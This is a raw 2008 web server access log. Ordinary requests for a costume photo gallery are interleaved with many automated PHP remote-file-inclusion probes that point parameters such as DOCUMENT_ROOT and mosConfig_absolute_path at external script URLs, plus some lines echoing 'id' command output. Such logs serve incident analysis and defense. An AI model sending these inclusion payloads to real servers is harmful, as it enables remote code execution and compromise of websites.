67.18.151.242 - - [07/Aug/2008:08:02:21 -0500] "GET /logs/access_log.1213315200/!scanhttp://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 354 "-""libwww-perl/5.810"
91.121.7.9 - - [07/Aug/2008:08:02:29 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
91.121.7.9 - - [07/Aug/2008:08:02:29 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
60.48.241.227 - - [07/Aug/2008:08:03:00 -0500] "GET /costume/index1.htm HTTP/1.1" 200 21563 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
213.133.102.211 - - [07/Aug/2008:08:03:31 -0500] "GET ///addpost_newpoll.php?addpoll=preview&thispath=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:08:03:31 -0500] "GET /logs///addpost_newpoll.php?addpoll=preview&thispath=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:08:03:31 -0500] "GET /logs/access_log.1215907200///addpost_newpoll.php?addpoll=preview&thispath=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 332 "-""libwww-perl/5.806"
60.48.241.227 - - [07/Aug/2008:08:03:32 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:03:35 -0500] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:03:36 -0500] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:03:38 -0500] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:03:39 -0500] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:03:40 -0500] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:03:44 -0500] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:03:44 -0500] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
91.121.24.195 - - [07/Aug/2008:08:03:47 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
91.121.24.195 - - [07/Aug/2008:08:03:47 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://sujianto.com/id.txt?%0D?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
60.48.241.227 - - [07/Aug/2008:08:03:48 -0500] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:03:51 -0500] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:03:52 -0500] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:03:55 -0500] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:03:58 -0500] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:12 -0500] "GET /costume/thmb2.htm HTTP/1.1" 200 3346 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:12 -0500] "GET /costume/costm13.jpg HTTP/1.1" 200 10011 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:13 -0500] "GET /costume/costm14.jpg HTTP/1.1" 200 10586 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:13 -0500] "GET /costume/costm15.jpg HTTP/1.1" 200 9724 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:14 -0500] "GET /costume/costm17.jpg HTTP/1.1" 200 9825 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:16 -0500] "GET /costume/costm16.jpg HTTP/1.1" 200 9075 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:16 -0500] "GET /costume/costm18.jpg HTTP/1.1" 200 9364 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:19 -0500] "GET /costume/costm19.jpg HTTP/1.1" 200 10555 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:23 -0500] "GET /costume/costm21.jpg HTTP/1.1" 200 9439 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:24 -0500] "GET /costume/costm20.jpg HTTP/1.1" 200 57110 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:27 -0500] "GET /costume/costm22.jpg HTTP/1.1" 200 9434 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:28 -0500] "GET /costume/costm23.jpg HTTP/1.1" 200 9858 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:04:29 -0500] "GET /costume/costm24.jpg HTTP/1.1" 200 9990 "http://tomdolan.pconline.com/costume/thmb2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:06:54 -0500] "GET /costume/thmb5.htm HTTP/1.1" 200 2921 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:06:54 -0500] "GET /costume/costume49%20copy.JPG HTTP/1.1" 200 16898 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
212.115.37.130 - - [07/Aug/2008:08:06:57 -0500] "GET /logs//loadenv.inc.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 305 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
212.115.37.130 - - [07/Aug/2008:08:06:57 -0500] "GET //loadenv.inc.php?DOCUMENT_ROOT=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 300 "-""Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)"
60.48.241.227 - - [07/Aug/2008:08:06:59 -0500] "GET /costume/costm50.jpg HTTP/1.1" 200 53503 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:07:00 -0500] "GET /costume/costume51%20copy.JPG HTTP/1.1" 200 16648 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:07:02 -0500] "GET /costume/costume52%20copy.JPG HTTP/1.1" 200 16497 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:07:06 -0500] "GET /costume/costume53%20copy.JPG HTTP/1.1" 200 16962 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:07:07 -0500] "GET /costume/costume54%20copy.JPG HTTP/1.1" 200 16716 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:07:08 -0500] "GET /costume/costume55%20copy.JPG HTTP/1.1" 200 16737 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:07:09 -0500] "GET /costume/costume56%20copy.JPG HTTP/1.1" 200 16276 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:07:10 -0500] "GET /costume/costume57%20copy.JPG HTTP/1.1" 200 16878 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:07:12 -0500] "GET /costume/costume58%20copy.JPG HTTP/1.1" 200 16381 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:07:12 -0500] "GET /costume/costume59%20copy.JPG HTTP/1.1" 200 15800 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:07:17 -0500] "GET /costume/costume60.JPG HTTP/1.1" 200 56431 "http://tomdolan.pconline.com/costume/thmb5.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
67.18.151.242 - - [07/Aug/2008:08:07:36 -0500] "GET /logs/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:08:07:36 -0500] "GET /smf/smf.functions.php?pConfig_auth[smf_path]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
74.6.18.216 - - [07/Aug/2008:08:07:36 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.31.189 - - [07/Aug/2008:08:07:36 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.18.151.242 - - [07/Aug/2008:08:08:45 -0500] "GET /logs/smf/smf.functions.php?pConfig_auth[smf_path]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:08:08:45 -0500] "GET /smf/smf.functions.php?pConfig_auth[smf_path]=http://www.lethalwow.com/akon/ooid.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.810"
60.48.241.227 - - [07/Aug/2008:08:09:09 -0500] "GET /costume/thmb9.htm HTTP/1.1" 200 2155 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:10 -0500] "GET /costume/costume97%20copy.JPG HTTP/1.1" 200 15963 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:10 -0500] "GET /costume/costume98%20copy.JPG HTTP/1.1" 200 16840 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:11 -0500] "GET /costume/costume99%20copy.JPG HTTP/1.1" 200 16783 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:13 -0500] "GET /costume/costume104.JPG HTTP/1.1" 200 60508 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:14 -0500] "GET /costume/costume101%20copy.JPG HTTP/1.1" 200 16134 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:14 -0500] "GET /costume/costume102%20copy.JPG HTTP/1.1" 200 14869 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:16 -0500] "GET /costume/costume103%20copy.JPG HTTP/1.1" 200 16604 "http://tomdolan.pconline.com/costume/thmb9.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:43 -0500] "GET /costume/thmb4.htm HTTP/1.1" 200 3298 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:44 -0500] "GET /costume/costm37.jpg HTTP/1.1" 200 9819 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:47 -0500] "GET /costume/costm38.jpg HTTP/1.1" 200 9710 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:49 -0500] "GET /costume/costm39.jpg HTTP/1.1" 200 9800 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:50 -0500] "GET /costume/costm41.jpg HTTP/1.1" 200 9976 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
216.133.204.228 - - [07/Aug/2008:08:09:50 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:08:09:50 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 365 "-""libwww-perl/5.79"
216.133.204.228 - - [07/Aug/2008:08:09:50 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://bloggar.web44.net/resp.txt???? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
60.48.241.227 - - [07/Aug/2008:08:09:50 -0500] "GET /costume/costm42.jpg HTTP/1.1" 200 9593 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:53 -0500] "GET /costume/costm43.jpg HTTP/1.1" 200 9745 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:54 -0500] "GET /costume/costm44.jpg HTTP/1.1" 200 9808 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:55 -0500] "GET /costume/costm46.jpg HTTP/1.1" 200 9599 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:55 -0500] "GET /costume/costm45.jpg HTTP/1.1" 200 9735 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:56 -0500] "GET /costume/costm40.jpg HTTP/1.1" 200 60324 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:56 -0500] "GET /costume/costm47.jpg HTTP/1.1" 200 9945 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
60.48.241.227 - - [07/Aug/2008:08:09:59 -0500] "GET /costume/costm48.jpg HTTP/1.1" 200 10085 "http://tomdolan.pconline.com/costume/thmb4.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
217.133.215.166 - - [07/Aug/2008:08:10:58 -0500] "GET /logs/index.php?redir=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
217.133.215.166 - - [07/Aug/2008:08:11:00 -0500] "GET /index.php?redir=http://www.minorleaguesportsfans.com/ids.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.253.134.145 - - [07/Aug/2008:08:11:15 -0500] "GET /logs/access_log.1214438400//htmltonuke.php?filnavn=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.79"
87.253.134.145 - - [07/Aug/2008:08:11:15 -0500] "GET //htmltonuke.php?filnavn=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.253.134.145 - - [07/Aug/2008:08:11:16 -0500] "GET /logs//htmltonuke.php?filnavn=http://www.lservice.com/lservice/contenido/cronjobs/idilegal.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.79"
66.199.244.42 - - [07/Aug/2008:08:12:22 -0500] "GET //skin/board/default/doctype.php?dir=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 315 "-""Advanced Browser (http://www.avantbrowser.com)"
77.90.20.2 - - [07/Aug/2008:08:15:22 -0500] "GET /logs/access_log.1212278400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
89.171.112.121 - - [07/Aug/2008:08:15:22 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.171.112.121 - - [07/Aug/2008:08:15:27 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://test.rollespil.dk/joomla/templates/id.txt????? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:15:34 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.90.20.2 - - [07/Aug/2008:08:15:34 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.90.20.2 - - [07/Aug/2008:08:15:34 -0500] "GET /logs/access_log.1214784000//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
67.18.151.242 - - [07/Aug/2008:08:16:07 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.mamolar.com/~reloj/id.txt? HTTP/1.1" 404 322 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:08:16:09 -0500] "GET /phphtml.php?htmlclass_path=http://www.mamolar.com/~reloj/id.txt? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
67.18.151.242 - - [07/Aug/2008:08:16:09 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.mamolar.com/~reloj/id.txt? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
208.82.247.252 - - [07/Aug/2008:08:16:17 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 302 "-""libwww-perl/5.808"
208.82.247.252 - - [07/Aug/2008:08:16:17 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 307 "-""libwww-perl/5.808"
208.82.247.252 - - [07/Aug/2008:08:16:17 -0500] "GET /logs/access_log.1216598400//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 329 "-""libwww-perl/5.808"
77.90.20.2 - - [07/Aug/2008:08:16:19 -0500] "GET /logs/access_log.1206230400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007"
77.90.20.2 - - [07/Aug/2008:08:17:17 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:17:17 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:17:22 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:17:23 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:18:13 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:18:19 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
83.172.146.49 - - [07/Aug/2008:08:18:33 -0500] "GET /logs/access_log.1212883200////?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
83.172.146.49 - - [07/Aug/2008:08:18:33 -0500] "GET ////?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 200 1245 "-""libwww-perl/5.79"
83.172.146.49 - - [07/Aug/2008:08:18:34 -0500] "GET /logs/access_log.1212883200////?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
83.172.146.49 - - [07/Aug/2008:08:18:35 -0500] "GET ////?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 200 1245 "-""libwww-perl/5.79"
83.172.146.49 - - [07/Aug/2008:08:18:35 -0500] "GET /logs////?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 200 94318 "-""libwww-perl/5.79"
83.172.146.49 - - [07/Aug/2008:08:18:36 -0500] "GET /logs////?mosConfig_absolute_path=http://www.geocities.com/cefill25/bot/safe.txt?? HTTP/1.1" 200 94318 "-""libwww-perl/5.79"
77.90.20.2 - - [07/Aug/2008:08:19:54 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:19:54 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:20:27 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 343 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:20:32 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
213.133.102.211 - - [07/Aug/2008:08:21:16 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:08:21:16 -0500] "GET /logs/access_log.1212278400//admin/business_inc/saveserver.php?thisdir=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.806"
213.133.102.211 - - [07/Aug/2008:08:21:16 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.806"
79.27.82.66 - - [07/Aug/2008:08:22:17 -0500] "GET /logs/?sourcedir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 94311 "-""libwww-perl/5.805"
79.27.82.66 - - [07/Aug/2008:08:22:17 -0500] "GET /?sourcedir=http://illeganza.altervista.org/id.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
77.90.20.2 - - [07/Aug/2008:08:23:17 -0500] "GET /logs/access_log.1212278400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 365 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
77.90.20.2 - - [07/Aug/2008:08:23:17 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.geocities.com/ardian.saputtra/id.txt? HTTP/1.1" 404 338 "-""Microsoft Internet Explorer/4.0b1 (Windows 95)"
